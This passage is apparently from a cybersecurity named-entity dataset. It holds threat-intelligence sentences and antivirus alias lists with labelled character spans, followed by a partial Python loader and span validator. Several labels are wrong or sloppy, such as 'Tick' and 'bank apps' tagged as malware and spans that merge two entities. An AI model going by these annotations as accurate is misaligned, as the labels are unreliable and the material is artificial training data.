"THREAT_ACTOR: an espionage campaign.": [[61, 83]]}, "info": {"id": "cyner2_train_006038", "source": "cyner2_train"}} {"text": "The software masqueraded as a confidential document and was intended to infect a Windows computer.", "spans": {"SYSTEM: software": [[4, 12]], "SYSTEM: Windows computer.": [[81, 98]]}, "info": {"id": "cyner2_train_006039", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Proxy.Delf.C Trojan-Proxy/W32.Steredir.524288 Trojan/Proxy.Steredir.a TROJ_PROXY.ARF Backdoor.Trojan.Client TROJ_PROXY.ARF Win.Trojan.Proxy-467 Trojan.Proxy.Delf.C Trojan-Proxy.Win32.Steredir.a Trojan.Proxy.Delf.C Trojan.Win32.Steredir.dqbk Trojan.Win32.Proxy.524288 Troj.Proxy.W32.Steredir.a!c Trojan.Proxy.Delf.C TrojWare.Win32.TrojanProxy.Delf.C Trojan.Proxy.Delf.C BackDoor.StealthRedir.20 W32/Risk.HXFA-2912 
TrojanProxy.Steredir.m TR/Proxy.Steredir.A.2 Trojan.Proxy.Delf.C Trojan-Proxy.Win32.Steredir.a TrojanProxy:Win32/Delf.C Backdoor.RAT.StealthRedirector.V2.0 TrojanProxy.Steredir Win32/TrojanProxy.Delf.C Win32.Trojan-proxy.Steredir.Eawz Trojan.PR.Steredir!IftwXs0S3T4 W32/Delf.A!tr Win32/Trojan.Proxy.118", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006041", "source": "cyner2_train"}} {"text": "These attempts differed from other tactics seen by us elsewhere, such as those connected to Iran, with better attention paid to the operation of the campaign.", "spans": {"THREAT_ACTOR: the operation of the campaign.": [[128, 158]]}, "info": {"id": "cyner2_train_006043", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropper.Dinwod.Win32.1277 Trojan.Zusy.D217BF Win32.Trojan.Delf.iv Trojan.Win32.Dinwod.dqohqi Trojan.MulDrop6.4509 Trojan[Dropper]/Win32.Dinwod Trojan:Win32/Walinlog.A TrojanDropper.Dinwod Win32/Delf.SRU Trojan.DR.Dinwod!WCRzCOHRNbg Win32/Trojan.c58", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006045", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Swisyn!O Trojan.Swisyn W32/Backdoor.KUPO-4695 TROJ_SWISYN.KK Trojan.Win32.Swisyn.cbuq Troj.W32.Swisyn!c Win32.Trojan.Swisyn.Lrsk Trojan.MulDrop3.21821 Trojan.Swisyn.Win32.23323 TROJ_SWISYN.KK Trojan.Win32.Swisyn W32/Backdoor2.HJRU Trojan/Swisyn.vuq Trojan/Win32.Swisyn Trojan.Win32.A.Swisyn.35840.B[UPX] Trojan.Win32.Swisyn.cbuq TrojanDropper:Win32/Bolardoc.A Trojan/Win32.Swisyn.R43544 Trojan.Swisyn Win32/VB.ODF Trojan.Swisyn!Pk7uhYgClNU W32/Swisyn.CBUQ!tr Win32/Trojan.Dropper.c9f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006047", "source": "cyner2_train"}} {"text": "The adversary had also conducted attacks using Daserf malware in the past, and Symantec refers to them as Tick in their report", "spans": {"THREAT_ACTOR: The adversary": [[0, 13]], "MALWARE: Daserf malware": [[47, 61]], 
"ORGANIZATION: Symantec": [[79, 87]], "MALWARE: Tick": [[106, 110]]}, "info": {"id": "cyner2_train_006049", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.DB9B Spyware.OnlineGames W32/Palevo.eszc Riskware.Win32.Lime.cukpjv HV_PALEVO_CA2255B5.TOMC W32.Worm.Palevo-187 Worm.P2P.Palevo!qwzmy5h6XK0 Worm.Win32.A.P2P-Palevo.2637834[h] Win32.HLLW.Lime.2579 Worm.Palevo.Win32.83875 BehavesLike.Win32.Trojan.vc Worm/Palevo.cubr Worm[P2P]/Win32.Palevo Trojan.Kazy.D1020 Worm/Win32.Palevo Worm.Palevo P2P-Worm.Win32.Palevo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006050", "source": "cyner2_train"}} {"text": "Malicious programs of this family request administrator rights and then make themselves invisible in the list of installed apps.", "spans": {}, "info": {"id": "cyner2_train_006052", "source": "cyner2_train"}} {"text": "RSA Research investigated the source of suspicious, observed beaconing", "spans": {"ORGANIZATION: RSA Research": [[0, 12]]}, "info": {"id": "cyner2_train_006053", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Enemany.A@mm Worm/W32.Alcaul.9728.C W32.Enemany.A.int Enemany.A Win32/Enemany.A!intended WORM_ENEMANY.A Email-Worm.Win32.Alcaul.r Win32.Enemany.A@mm I-Worm.Enemany!xtYbjkEFnbQ Win32.Enemany.A@mm Worm.Win32.Enemany.A Win32.Enemany.A@mm Worm.Alcaul.Win32.145 WORM_ENEMANY.A W32/Risk.ZRGC-4282 Worm.Alcaul.r.kcloud Worm:Win32/Enmny.A I-Worm.Win32.Enemany.A[h] Win32/Enemany.worm.9728 Win32.Enemany.A@mm Worm.Win32.Alcaul.am Win32/Enemany.A Email-Worm.Win32.Alcaul W32/Alcaul.R!worm W32/Enemany.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006054", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanSpy.Hakey.FC.1702 TSPY_HAKEY.SM MSIL.Trojan-Spy.Keylogger.a Backdoor.Trojan Win32/SillyAutorun.FJI TSPY_HAKEY.SM Trojan.Win32.Win32.dcdhel W32/Application.ZMXW-2371 TrojanSpy:MSIL/Hakey.A MSIL/Spy.Keylogger.DY Trojan-Dropper.MSIL", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006055", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9914 Trojan-Ransom.Win32.Birele.aisl Win32.Trojan.Birele.Wtxf Trojan.MulDrop6.10288 Trojan-Ransom.Win32.Birele.aisl Trojan-Ransom.Win32.Foreign", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006057", "source": "cyner2_train"}} {"text": "Moreover, the presence of intrusion software does not necessarily equate to its misuse, as such software may be utilized by intelligence or law enforcement agencies in a manner that conforms with rule of law and democratic principles.", "spans": {}, "info": {"id": "cyner2_train_006058", "source": "cyner2_train"}} {"text": "What is the scope of Chrysaor ? Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play .", "spans": {"MALWARE: Chrysaor": [[21, 29], [32, 40]], "SYSTEM: Google Play": [[64, 75], [125, 136]]}, "info": {"id": "cyner2_train_006059", "source": "cyner2_train"}} {"text": "This is significant, because it indicates a potential shift in the motives of this adversary.", "spans": {}, "info": {"id": "cyner2_train_006060", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/Inject.knu Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win.Trojan.Inject-4540 Trojan.Win32.Donbot.ctdhoe Trojan.Win32.Z.Inject.646633 BackDoor.Donbot.2 Backdoor.Inject.Win32.2858 BehavesLike.Win32.PWSZbot.jc Backdoor/Inject.cpw TR/Donbot.hjsmv Trojan/Win32.Invader Win32.Troj.Undef.kcloud Trojan:Win32/Donbot.A Backdoor/Win32.Trojan.R78442 Backdoor.Inject Win32.Trojan.Spnr.Pijv Backdoor.Inject!WaCQ7k+5qK0 Win32/Trojan.BO.cc2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006062", "source": "cyner2_train"}} {"text": "The original name given to the encryptor by its creator is not known; other security vendors detect it as Trojan.Encoder.858, 
Ransom:Win32/Troldesh.", "spans": {"MALWARE: encryptor": [[31, 40]], "THREAT_ACTOR: creator": [[48, 55]]}, "info": {"id": "cyner2_train_006064", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.JaydarkE.Trojan Win32.Runouce.B@mm Virus.Worm.Win32.Runouce.1!O W32.Runouce.B Win32.Runouce.B@mm W32.W.Runouce.lk4E W32/Chir.b.dannado Win32.Runouce.E2C45E W32.Chir.B@mm Win32/Chir.B WORM_CHIR.DI Win.Worm.Brontok-88 Win32.Virus.Chir.A Win32.Runouce.B@mm Virus.Win32.Runouce.bxafx Win32.Chir.B Win32.Runouce.B@mm Win32.Runonce.6652 WORM_CHIR.DI BehavesLike.Win32.Virut.nh Email-Worm.Win32.Runouce Win32/cnPeace.b W32/Chir.I Worm[Email]/Win32.Runouce.b Worm.NimdaT.d.18848 Trojan:JS/Nimda.A Win32/ChiHack.6652 W32/Chir.b@MM Virus.Win32.Chur.A Win32/Chir.B Worm.Win32.Runouce.a I-Worm.Chir.B Win32/Trojan.1a7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006067", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 Virus/W32.Sality.D Worm.Dumpy.S19687 Win32.Sality.3 Virus.Sality.Win32.25 Win32.Sality.3 Win32.Sality.3 W32.Sality.AE Win32/Sality.AA PE_SALITY.RL Trojan-Ransom.Win32.Blocker.gfeq Virus.Win32.Sality.beygb Win32.Sality.3 Win32.Sality.3 Win32.Sector.30 BehavesLike.Win32.Sality.cm Win32/HLLP.Kuku.poly2 W32/Sality.AT Worm:Win32/Dumpy.B Trojan-Ransom.Win32.Blocker.gfeq Win32.Virus.Sality.A HEUR/Fakon.mwf Virus.Win32.Sality.bakc Worm.AutoRun W32/Sality.AA Win32.Sality Win32/Sality.NBA Trojan-Ransom.Win32.Blocker.b Win32.Sality.BL Worm.Win32.Dumpy Virus.Win32.Sality.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006069", "source": "cyner2_train"}} {"text": "This all started with the great analysis and blog done by RSA in August 2017 about a phishing wave targeting Russian Banks.", "spans": {"ORGANIZATION: RSA": [[58, 61]], "ORGANIZATION: Russian Banks.": [[109, 123]]}, "info": {"id": "cyner2_train_006073", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Win32.Trojan.WisdomEyes.16070401.9500.9717 Trojan.Win32.Zbot.dsnigs Trojan.Reconyc.Win32.16630 TrojanSpy.Zbot.ewlp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006075", "source": "cyner2_train"}} {"text": "The emails come with an attached Microsoft Word document file.", "spans": {"SYSTEM: Microsoft Word": [[33, 47]]}, "info": {"id": "cyner2_train_006076", "source": "cyner2_train"}} {"text": "During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange DDE technique that has been previously reported by Advanced Threat Research.", "spans": {"THREAT_ACTOR: the APT28 threat group, McAfee Advanced Threat Research": [[43, 98]], "SYSTEM: the Microsoft Office Dynamic Data Exchange DDE": [[170, 216]], "ORGANIZATION: Advanced Threat Research.": [[264, 289]]}, "info": {"id": "cyner2_train_006077", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Webprefix!O Trojan.Webprefix.B3 Trojan.Webprefix.Win32.30550 Trojan/Webprefix.agl Win32.Trojan.Webprefix.d Trojan.Farfli Win32/Webprefix.F Trojan-Downloader.Win32.Klevate.bv Trojan.Win32.Webprefix.balbkt Troj.W32.Webprefix.agl!c Trojan.Win32.Krypttik.a Trojan.Webprefix.13 BehavesLike.Win32.Trojan.ch Trojan/Webprefix.w W32.Trojan.Webprefix Trojan[Packed]/Win32.Katusha Trojan:Win32/Webprefix.B Trojan.Win32.A.Webprefix.128000.B Trojan-Downloader.Win32.Klevate.bv Packed/Win32.Katusha.R3725 Trojan.Webprefix.01 Trojan.Webprefix!EZ6BvH+ekbw Packer.Win32.Katusha", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006080", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Constructor.MS04-032.b Riskware.Win32.MS04-032.hrwi W32/Trojan.NOKE-5825 Trojan.Moo Constructor.Win32.MS04-032.b Exploit.MS04-032.B Constructor.Win32.MS04-032.b Tool.MS04.Win32.28 W32/TrojanX.IRQ Constructor.MS04-032.d 
KIT/MS04-032.B W32/MS04_032.B!kit HackTool[Constructor]/Win32.MS04-032 Constructor.W32.MS04-032.b!c Constructor/Xema.36864 Trojan:Win32/Shelcod.A Constructor.MS04032 VirTool.Win32.MS04 Constructor.AMN Trojan.Win32.MS04-032.b Win32/Constructor.990", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006086", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.BO2K.1.1.2.plugin Backdoor.BO2K.1.1.2.plugin Backdoor/Orifice2K.plugin Win32.Trojan.WisdomEyes.16070401.9500.9851 W32/Risk.JQIA-3547 Backdoor.BO2K.1.1.2.plugin Backdoor.Win32.BO2K.112.plugin Backdoor.BO2K.1.1.2.plugin Trojan.Win32.BO2K-112.guih Win32.Backdoor.Bo2k.Edxg Backdoor.BO2K.1.1.2.plugin Backdoor.Win32.BO2K.112.plugin Backdoor.BO2K.1.1.2.plugin BackDoor.BO2k.plugin Backdoor.BO2K.Win32.168 Backdoor/BO2K.112.Plugin BDS/Bo2k.112.plugin.3 Trojan[Backdoor]/Win32.BO2K Backdoor.BO2K.1.1.2.plugin Backdoor.Win32.BO2K.112.plugin Backdoor:Win32/BO2K.1_12 Backdoor.BO2K.112 Win32/BO2K.112.plugin Backdoor.BO2K.plugin!QCV0kLCiRV0 Trojan.Win32.BO2K", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006087", "source": "cyner2_train"}} {"text": "In late August 2015, Symantec identified a previously unknown back door Trojan Backdoor.Dripion infecting organizations primarily located in Taiwan, as well as Brazil and the United States.", "spans": {"ORGANIZATION: Symantec": [[21, 29]], "MALWARE: unknown back door Trojan": [[54, 78]], "ORGANIZATION: organizations": [[106, 119]]}, "info": {"id": "cyner2_train_006090", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Rakhni Downloader.Rakhni.Win32.344 Trojan-Downloader.Win32.Rakhni.moc TrojanDownloader.Rakhni.hu TR/Dldr.Delf.ltfzo TrojanDownloader:Win32/Docdobex.A Trojan.Zusy.D3FCFF Trojan-Downloader.Win32.Rakhni.moc Downloader/Win32.Rakhni.C2136522 TrojanDownloader.Rakhni W32/Delf.CDW!tr.bdr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006091", 
"source": "cyner2_train"}} {"text": "Malware mostly communicating with compromised domains", "spans": {"MALWARE: Malware": [[0, 7]]}, "info": {"id": "cyner2_train_006094", "source": "cyner2_train"}} {"text": "Programs of this family interfere with bank apps, such as the Commerzbank app or Google Play.", "spans": {"MALWARE: Programs": [[0, 8]], "MALWARE: family": [[17, 23]], "MALWARE: bank apps,": [[39, 49]], "SYSTEM: Commerzbank app": [[62, 77]], "SYSTEM: Google Play.": [[81, 93]]}, "info": {"id": "cyner2_train_006098", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB Trojan/VB.pra Trojan.Kazy.D61DA Win32.Trojan.WisdomEyes.16070401.9500.9965 W32.SillyFDC Win32/Tnega.AEVL Trojan.Win32.VB.aspi Trojan.Win32.VB.eijsbx Trojan.Win32.A.VB.40960.AS Troj.W32.Vb!c Trojan.VB.Win32.100469 BehavesLike.Win32.Vilsel.pz Trojan/VB.ckmo Trojan:Win32/Tazi.A Trojan.Win32.VB.aspi HEUR/Fakon.mwf Trojan.VB Worm.AutoRun Win32/VB.PRA Win32.Trojan.Vb.Ljka Trojan.VB!n6riGwYVvNo Trojan.Win32.VB W32/SillyFDC.IZ!tr Win32/Trojan.db1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006099", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom/W32.WannaCry.5267459 Ransom.WannaCrypt.S1670344 Ransom.WannaCrypt Trojan/Exploit.CVE-2017-0147.a Ransom_WCRY.SMALYM Win32.Worm.Rbot.a Ransom.Wannacry Ransom_WCRY.SMALYM Win.Ransomware.WannaCry-6313787-0 Win32.Exploit.CVE-2017-0147.A Trojan-Ransom.Win32.Wanna.m Trojan.Win32.Wanna.epxkni Trojan.Win32.WannaCry.5267459 Troj.Ransom.W32.Wanna.toP0 Trojan.Encoder.11432 Exploit.CVE.Win32.1765 BehavesLike.Win32.RansomWannaCry.th Trojan.Wanna.k Trojan[Ransom]/Win32.Wanna Ransom:Win32/WannaCrypt.A!rsm Trojan-Ransom.Win32.Wanna.m Trojan/Win32.WannaCryptor.R200894 Hoax.Wanna Trj/GdSda.A Win32/Exploit.CVE-2017-0147.A Trojan-Ransom.Win32.Wanna.m Exploit.CVE-2017-0147! 
Trojan.Win32.Exploit W32/WannaCryptor.H!tr.ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006100", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packer.FSG.A Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Downloader.BFIA Downloader.Trojan TROJ_APHER.A Win.Trojan.Small-10534 Packer.FSG.A Trojan-Downloader.Win32.WebDown.10 Packer.FSG.A Trojan.Win32.WebDown.cdwvkr Packer.FSG.A TrojWare.Win32.TrojanDownloader.Apher.0700 Packer.FSG.A Trojan.DownLoader.4572 TROJ_APHER.A Trojan-Downloader.Win32.WebDown W32/Downloader.MUZI-7025 Trojan/Downloader.WebDown.10 Trojan/Win32.Unknown Packer.FSG.A Trojan-Downloader.Win32.WebDown.10 Win-Trojan/Apher.1312 Packer.FSG.A Trj/Downloader.GE Win32/Randon.A W32/Dloader.AE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006101", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.D.EED80 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Bayrob.etejdt BehavesLike.Win32.Ipamor.jc Trojan/Win32.Scar.C59481 Trojan.Win32.Woripecs W32/Scar.CTI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006102", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.14336.BM Trojan.Zenshirsh.SL7 Backdoor.Small.Win32.3772 Backdoor/Small.wn BKDR_RINCUX.AD Trojan.Win32.Scar.nzec Backdoor.Win32.Small.32768.H[UPX] Backdoor.W32.Small.wn!c Trojan.DownLoad3.19355 BKDR_RINCUX.AD BehavesLike.Win32.Backdoor.lm BDS/Salamdom.A Trojan.Win32.Scar.nzec Backdoor:Win32/Salamdom.A Adware/AdHelper.B Win32/Salamdom.AA Win32.Backdoor.Small.Sxyt Backdoor.Small!t0Kn4UZH16w Trojan-Downloader.Win32.Pangu W32/ServStart.AS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006103", "source": "cyner2_train"}} {"text": "Our analysis confirms the excellent investigative work done by TALOS and expands on what they found.", "spans": {}, "info": {"id": "cyner2_train_006108", "source": "cyner2_train"}} 
{"text": "TABLE OF CONTENTS Key Findings Introduction Threat Analysis Fakespy Code Analysis Dynamic Library Loading Stealing Sensitive Information Anti-Emulator Techniques Under Active Development Who is Behind Fakespy 's Smishing Campaigns ? Conclusions Cybereason Mobile Detects and Stops FakeSpy Indicators of Compromise INTRODUCTION For the past several weeks , Cybereason has been investigating a new version of Android malware dubbed FakeSpy , which was first identified in October 2017 and reported again in October 2018 .", "spans": {"MALWARE: Fakespy": [[60, 67], [201, 208]], "ORGANIZATION: Cybereason Mobile": [[245, 262]], "MALWARE: FakeSpy": [[281, 288], [430, 437]], "ORGANIZATION: Cybereason": [[356, 366]], "SYSTEM: Android": [[407, 414]]}, "info": {"id": "cyner2_train_006109", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke/W32.ArchSMS.2449920.C Trojan.Zusy.D14269 Win32.Trojan.WisdomEyes.16070401.9500.9992 not-a-virus:WebToolbar.Win32.Webatla.b Trojan.Win32.ArchSMS.csnmld Trojan.SMSSend.4975 Tool.ArchSMS.Win32.17120 BehavesLike.Win32.BadFile.vc Trojan:Win32/Blinerarch.A Trojan/Win32.ArchSMS.C198920 Hoax.ArchSMS Trojan.ArchSMS!HGAxbs185b0 Hoax.Win32.ArchSMS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006111", "source": "cyner2_train"}} {"text": "Over the course of their campaigns, we analyzed their modus operandi and dissected their tools of the trade—and uncovered common denominators indicating that PLEAD, Shrouded Crossbow, and Waterbear may actually be operated by the same group.", "spans": {"THREAT_ACTOR: campaigns,": [[25, 35]], "MALWARE: PLEAD, Shrouded Crossbow,": [[158, 183]], "MALWARE: Waterbear": [[188, 197]], "ORGANIZATION: the same group.": [[226, 241]]}, "info": {"id": "cyner2_train_006112", "source": "cyner2_train"}} {"text": "Hancitor is one of the better-known malware downloaders due to its numerous SPAM runs and evolving delivery technique.", "spans": {"MALWARE: Hancitor": [[0, 8]], "MALWARE: 
malware downloaders": [[36, 55]]}, "info": {"id": "cyner2_train_006114", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FantibagB.Trojan Email-Worm.Win32.Bagle!O Win32.Trojan.WisdomEyes.16070401.9500.9958 Win32/Fantibag.E Email-Worm.Win32.Bagle.cv Email-Worm.Win32.Bagle Worm/Bagle.aac TR/Bagle.BR.A.Dll I-Worm.Win32.Bagle.FA Email-Worm.Win32.Bagle.cv Trojan:Win32/Fantibag.B Win32/Bagle.BI Trojan.Fantibag.A1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006116", "source": "cyner2_train"}} {"text": "It is meant solely to empty the safe of ATMs. We detect this new malware family as BKDR_ALICE.A.", "spans": {"MALWARE: malware": [[65, 72]]}, "info": {"id": "cyner2_train_006117", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.Refroso.B Trojan/W32.Refroso.62976.D Trojan.Win32.Refroso!O Trojan.Injector.5265 Trojan.Refroso.Win32.766 Trojan/Refroso.dzt Trojan.Dropper.Refroso.B Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_LETHIC.SMA Trojan.Win32.Refroso.ayz Trojan.Dropper.Refroso.B Trojan.Win32.Refroso.bwzzc Trojan.Dropper.Refroso.B Trojan.Dropper.Refroso.B BackDoor.Bifrost.26171 TROJ_LETHIC.SMA BehavesLike.Win32.Downloader.kc Backdoor/Poison.bhw Worm:Win32/Refroso.A Trojan[Downloader]/Win32.Refroso Win32.Troj.Refroso.kcloud Worm:Win32/Refroso.A Backdoor.Win32.Poison.46632 Trojan.Dropper.Refroso.B Trojan/Win32.Refroso.R694 Trojan.Dropper.Refroso.B Trojan.Win32.Buzus.8101325 Trojan.Refroso Trojan.Win32.Buzus W32/Injector.IA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006118", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPSW.LdPinch.cds PWS-Lineage.dll Trojan.Downloader-35380 Trojan-GameThief.Win32.OnLineGames.stab Trojan.PWS.Wsgame.origin PWS:Win32/Kotwir.A.dll Trojan-Downloader.Win32.Banload.aqi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006119", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan/W32.Blocker.194764 Trojan.Bepush.Win32.889 Trojan.Strictor.D7317 TROJ_SPNR.11GF13 Win32.Trojan.WisdomEyes.16070401.9500.9800 TROJ_SPNR.11GF13 Win.Trojan.Truado-1 Trojan.Win32.Dapato.dcitdy Trojan-Downloader:W32/Kilim.T Trojan.DownLoader9.41166 Trojan.JS.FBExt W32/Trojan.CAKN-6742 Trojan/Blocker.eyy TR/Dldr.Truado.B.5 TrojanDownloader:MSIL/Truado.B Trojan/Win32.Blocker.R77853 Hoax.Blocker Trj/CI.A Trojan.Blocker!Jm7NxUGe2as Win32/Trojan.a10", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006121", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.LdPinch.TMK Trojan-PWS/W32.LdPinch.557056 Trojan.PWS.LdPinch.TMK Trojan.PWS.LdPinch.TMK Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Pakes.nkj Trojan.PWS.LdPinch.TMK Trojan.Win32.Pakes.gkhlc Trojan.PWS.LdPinch.TMK Trojan.PWS.LdPinch.TMK BehavesLike.Win32.VirRansom.hc Trojan.PWS.LdPinch.TMK Trojan.DR.Jeshex!G2i88bn5YEw W32/LdPinch.TNV!tr.pws Win32/Trojan.PWS.912", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006122", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike.Win32.BadFile.nm TrojanDownloader:Win32/Xuwuq.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006124", "source": "cyner2_train"}} {"text": "A backdoor also known as: W64.HfsAutoA.4EC7 Exploit.CVE-2015-1701.A Trojan.Win64 Exploit.CVE-2015-1701.A W64/Trojan.CBXE-7834 Exploit.CVE-2015-1701.A Exploit.Win64.CVE-2015-1701.b Exploit.CVE-2015-1701.A Exploit.CVE-2015-1701.A Exploit.CVE2015-1701.1 BehavesLike.Win64.BadFile.mh Virus.Win32.Virut Exploit.CVE-2015-1701.e Trojan[Exploit]/EXE.CVE-2015-1701 Exploit.CVE-2015-1701.A Exploit.Win64.CVE.tnlV Exploit.Win64.CVE-2015-1701.b Trojan/Win32.Exploit.R200799 Exploit.Win64.CVE-2015-1701 Trj/CI.A Win64.Exploit.Cve-2015-1701.Ahyf W64/CVE_2015_1701.A!tr Win32/Trojan.Exploit.059", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006129", "source": "cyner2_train"}} 
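The records above all share one layout: a JSON object with a "text" field, a "spans" map whose keys are "LABEL: surface" and whose values are lists of [start, end] character offsets into the text (a list, because the same surface can occur more than once in a sentence, as "Super Mario Run" does in the head of this page), and an "info" block with the record id. Offsets are the only thing tying a label to the text, so any edit to "text" silently corrupts the annotation. The loader below is an added example, not part of the dataset or of the cyner project; the function names are mine. It parses records in this shape, checks every span against the text, and emits whitespace-token BIO tags for training. The first four sample lines are copied verbatim from records on this page; the fifth is constructed with its offsets shifted by one so the validator has a defect to report.

```python
"""Loader and span validator for JSON Lines NER records of the form used on this page:
{"text": ..., "spans": {"LABEL: surface": [[start, end], ...]}, "info": {"id": ..., "source": ...}}
Example code written for this page; not part of the dataset or its tooling."""
import json
import re
from typing import Dict, Iterator, List, Tuple

# Constructed sample input: four records copied from this page, one JSON object per line, plus one
# record ("constructed_bad_offsets") whose span was deliberately shifted by one character.
SAMPLE_JSONL = r'''
{"text": "The Darkhotel APT continues to spearphish targets around the world, with a wider geographic reach than its previous botnet buildout and hotel Wi-Fi attacks.", "spans": {"THREAT_ACTOR: The Darkhotel APT": [[0, 17]], "THREAT_ACTOR: spearphish": [[31, 41]], "MALWARE: botnet": [[116, 122]]}, "info": {"id": "cyner2_train_006023", "source": "cyner2_train"}}
{"text": "FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "VULNERABILITY: undisclosed vulnerability.": [[109, 135]]}, "info": {"id": "cyner2_train_006026", "source": "cyner2_train"}}
{"text": "Unit 42 researchers have uncovered a backdoor Trojan used in an espionage campaign.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "MALWARE: backdoor Trojan": [[37, 52]], "THREAT_ACTOR: an espionage campaign.": [[61, 83]]}, "info": {"id": "cyner2_train_006038", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom:Win32/Jaffrans.A!rsm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006020", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Downldr2.EOVV Infostealer.Bancos", "spans": {"MALWARE: backdoor": [[3, 11]]}, "info": {"id": "constructed_bad_offsets", "source": "constructed"}}
'''

Span = Tuple[str, str, int, int]  # (label, surface, start, end)
AKA_PREFIX = "A backdoor also known as:"


def parse_records(jsonl_text: str) -> List[dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def iter_spans(record: dict) -> Iterator[Span]:
    """Flatten {"LABEL: surface": [[s, e], ...]} into (label, surface, start, end) tuples.
    The key is split on the first ': ' only, since surfaces such as 'Ransom:Win32/...' contain colons."""
    for key, offsets in record["spans"].items():
        label, _, surface = key.partition(": ")
        for start, end in offsets:
            yield label, surface, start, end


def validate_spans(record: dict) -> List[str]:
    """Return one message per span whose offsets do not reproduce the surface text."""
    text = record["text"]
    problems = []
    for label, surface, start, end in iter_spans(record):
        if not (0 <= start < end <= len(text)):
            problems.append(f"{label} [{start},{end}) out of range for text of length {len(text)}")
        elif text[start:end] != surface:
            problems.append(f"{label} [{start},{end}) is {text[start:end]!r}, expected {surface!r}")
    return problems


def audit(jsonl_text: str) -> Dict[str, List[str]]:
    """Map record id -> problems, only for records that have at least one."""
    report = {}
    for rec in parse_records(jsonl_text):
        problems = validate_spans(rec)
        if problems:
            report[rec["info"]["id"]] = problems
    return report


def to_bio(record: dict) -> List[Tuple[str, str]]:
    """Whitespace-tokenise and emit (token, BIO tag). A token belongs to an entity when it lies
    entirely inside the span; spans are tried earliest-start, longest-first, so a nested annotation
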